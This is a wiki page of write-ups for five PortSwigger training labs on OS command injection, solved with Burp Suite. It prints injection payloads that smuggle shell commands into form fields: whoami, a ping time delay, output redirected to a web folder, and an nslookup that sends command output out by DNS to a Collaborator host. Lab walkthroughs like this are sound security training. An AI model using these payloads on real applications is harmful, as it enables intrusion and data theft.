OS Command Injection - NANDITHA90/PortSwigger-LABS GitHub Wiki

LAB - 1

OS command injection, simple case

  • About

    • This lab contains an OS command injection vulnerability in the product stock checker.
    • The application executes a shell command containing user-supplied product and store IDs and returns the raw output from the command in its response.
    • To solve the lab, execute the whoami command to determine the name of the current user.

(a) Using Burp Suite to Intercept and Modify a Request (Check Stock)

  • Burp Suite Proxy to Repeater

image

  • Modify : 1|whoami

image

SOLVED

image

LAB - 2

Blind OS command injection with time delays

  • About

    • This lab contains a blind OS command injection vulnerability in the feedback function.
    • The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.
    • To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay.

(a) Using Burp Suite to Intercept and Modify a Request (Submit Feedback)

  • Burp Suite Proxy to Repeater

image

  • Modify : email=x||ping+-c+10+127.0.0.1||

The Response Responds after 10 Seconds (Delay)

image

SOLVED

image

LAB - 3

Blind OS command injection with output redirection

  • About

    • This lab contains a blind OS command injection vulnerability in the feedback function.
    • The application executes a shell command containing the user-supplied details.
    • The output from the command is not returned in the response.
    • However, you can use output redirection to capture the output from the command. There is a writable folder at: /var/www/images/
    • The application serves the images for the product catalog from this location.
    • You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.
    • To solve the lab, execute the whoami command and retrieve the output.

(a) Using Burp Suite to Intercept and Modify a Request (Submit Feedback)

  • Burp Suite Proxy to Repeater

image

  • Modify : email=||whoami>/var/www/images/output.txt||

image

  • At Proxy

    • Intercept again for the Main Page

    • Send it to the Repeater

    • Modify the FileName : filename=output.txt

image

SOLVED

image

LAB - 4

Blind OS command injection with out-of-band interaction

  • About

    • This lab contains a blind OS command injection vulnerability in the feedback function.
    • The application executes a shell command containing the user-supplied details.
    • The command is executed asynchronously and has no effect on the application's response.
    • It is not possible to redirect output into a location that you can access.
    • However, you can trigger out-of-band interactions with an external domain.
    • To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

(a) Using Burp Suite to Intercept and Modify a Request (Submit Feedback)

  • Burp Suite Proxy to Repeater

image

  • Modify : email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

image

  • Right Click and Select Insert Collaboration Payload

image

image

image

SOLVED

LAB - 5

Blind OS command injection with out-of-band data exfiltration

  • About

    • This lab contains a blind OS command injection vulnerability in the feedback function.
    • The application executes a shell command containing the user-supplied details.
    • The command is executed asynchronously and has no effect on the application's response.
    • It is not possible to redirect output into a location that you can access.
    • However, you can trigger out-of-band interactions with an external domain.
    • To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator.
    • You will need to enter the name of the current user to complete the lab.

(a) Using Burp Suite to Intercept and Modify a Request (Submit Feedback)

  • Burp Suite Proxy to Repeater

image

  • Go to the Collaborator tab.

  • Click Copy to clipboard to copy a unique Burp Collaborator payload to your clipboard.

image

  • Modify the email parameter, changing it to something like the following, but insert your Burp Collaborator subdomain where indicated:

    • email=||nslookup+whoami.BURP-COLLABORATOR-SUBDOMAIN||

image

Paste the Collaborator Subdomain Copied earlier

image

  • Go back to the Collaborator tab, and click Poll now.

  • You should see some DNS interactions that were initiated by the application as the result of your payload.

image

  • If you don't see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously.

  • Observe that the output from your command appears in the subdomain of the interaction, and you can view this within the Collaborator tab.

  • The full domain name that was looked up is shown in the Description tab for the interaction.

image

peter-GZfOVi

image

  • To complete the lab, enter the name of the current user.

image

image

SOLVED